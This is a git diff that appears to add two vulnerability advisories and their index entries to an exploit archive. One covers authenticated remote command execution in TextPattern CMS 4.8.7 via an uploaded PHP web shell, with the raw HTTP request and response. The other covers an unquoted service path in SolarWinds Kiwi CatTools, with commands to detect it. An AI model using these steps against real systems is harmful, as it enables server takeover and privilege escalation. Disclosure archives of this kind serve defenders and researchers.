diff --git a/exploits/php/webapps/50415.txt b/exploits/php/webapps/50415.txt new file mode 100644 index 000000000..9b675423f --- /dev/null +++ b/exploits/php/webapps/50415.txt @@ -0,0 +1,43 @@ +# Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) +# Date: 2021/09/06 +# Exploit Author: Mert Daş merterpreter@gmail.com +# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip +# Software web: https://textpattern.com/ +# Tested on: Server: Xampp + +First of all we should use file upload section to upload our shell. +Our shell contains this malicious code: + +1) Go to content section . +2) Click Files and upload malicious php file. +3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode; + +After upload our file , our request and response is like below : + +Request: + +GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) +Gecko/20100101 Firefox/89.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; +PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi +Upgrade-Insecure-Requests: 1 + + +Response: + +HTTP/1.1 200 OK +Date: Thu, 10 Jun 2021 00:32:41 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 +X-Powered-By: PHP/7.4.20 +Content-Length: 22 +Connection: close +Content-Type: text/html; charset=UTF-8 + +pc\mertdas \ No newline at end of file diff --git a/exploits/windows/local/50416.txt b/exploits/windows/local/50416.txt new file mode 100644 index 000000000..5fa109e6f --- /dev/null +++ b/exploits/windows/local/50416.txt @@ -0,0 +1,38 @@ +# Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path +# Exploit Author: Mert DAŞ +# Version: 3.11.8 +# Date: 14.10.2021 +# Vendor Homepage: https://www.solarwinds.com/ +# Tested on: Windows 10 + +# Step to discover Unquoted Service Path : + +-------------------------------------- +C:\Users\Mert>sc qc CatTools +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: CatTools + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\nssm.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : CatTools + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem +--------------------------------------------- + +Or: +------------------------- +C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr +/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ +---------------------- + +#Exploit: + +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application +startup or reboot. If successful, the local user's code would execute with +the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 325172abd..345ae3c1f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11348,6 +11348,7 @@ id,file,description,date,author,type,platform,port 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, +50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -42672,6 +42673,7 @@ id,file,description,date,author,type,platform,port 47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php, 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp, +50415,exploits/php/webapps/50415.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Mert Daş",webapps,php, 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80